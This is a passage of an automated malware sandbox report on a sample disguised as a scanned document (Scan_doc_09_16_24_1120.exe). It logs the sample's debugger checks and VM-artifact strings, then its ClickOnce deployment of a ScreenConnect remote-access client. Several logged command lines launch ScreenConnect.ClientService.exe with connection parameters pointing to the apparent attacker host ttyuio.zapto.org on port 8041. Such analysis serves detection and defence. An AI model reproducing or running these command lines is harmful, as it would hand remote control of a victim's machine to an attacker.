                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593219Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592883Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592571Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\Jump to behavior
                  Source: Amcache.hve.5.drBinary or memory string: VMware
                  Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: dfsvc.exe, 00000001.00000002.2791465766.00000227204E4000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2794048940.0000022721C6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3271828172.000001E57F82B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3274237229.000001E585054000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3271223902.0000022264AD2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270802647.0000022264A27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: ScreenConnect.ClientService.exe, 0000000C.00000002.3269939866.000000000071C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: Amcache.hve.5.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.5.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: svchost.exe, 00000007.00000003.2088814426.0000022265A36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXTVMWare
                  Source: Amcache.hve.5.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeCode function: 0_2_0083191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0083191F
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeCode function: 0_2_00831000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00831000
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeCode function: 0_2_00833677 mov eax, dword ptr fs:[00000030h]0_2_00833677
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeCode function: 0_2_00836893 GetProcessHeap,0_2_00836893
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeCode function: 0_2_00831493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00831493
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeCode function: 0_2_0083191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0083191F
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeCode function: 0_2_00834573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00834573
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeCode function: 0_2_00831AAC SetUnhandledExceptionFilter,0_2_00831AAC
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  .NET source code references suspicious native API functions
                  Source: ScreenConnect.ClientService.dll.1.dr, ClientService.csReference to suspicious API methods: WindowsExtensions.OpenProcess(processID, (ProcessAccess)33554432)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5572 -ip 5572Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 684Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=73549b67-726b-470e-ab1a-fbbb83a6a15b&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\q57rwjaz.ogc\qe1vaw8h.r8n\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\screenconnect.clientservice.exe" "?e=support&y=guest&h=ttyuio.zapto.org&p=8041&s=73549b67-726b-470e-ab1a-fbbb83a6a15b&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&r=&i=untitled%20session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\q57rwjaz.ogc\qe1vaw8h.r8n\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\screenconnect.clientservice.exe" "?e=support&y=guest&h=ttyuio.zapto.org&p=8041&s=73549b67-726b-470e-ab1a-fbbb83a6a15b&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&r=&i=untitled%20session" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\q57rwjaz.ogc\qe1vaw8h.r8n\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\screenconnect.clientservice.exe" "?e=support&y=guest&h=ttyuio.zapto.org&p=8041&s=73549b67-726b-470e-ab1a-fbbb83a6a15b&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&r=&i=untitled%20session" "1"Jump to behavior
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.2273256028.0000000000FF2000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.drBinary or memory string: Progman
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.2273256028.0000000000FF2000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeCode function: 0_2_00831BD4 cpuid 0_2_00831BD4
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.ClientService.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsBackstageShell.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsFileManager.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsClient.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsFileManager.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.dll VolumeInformation
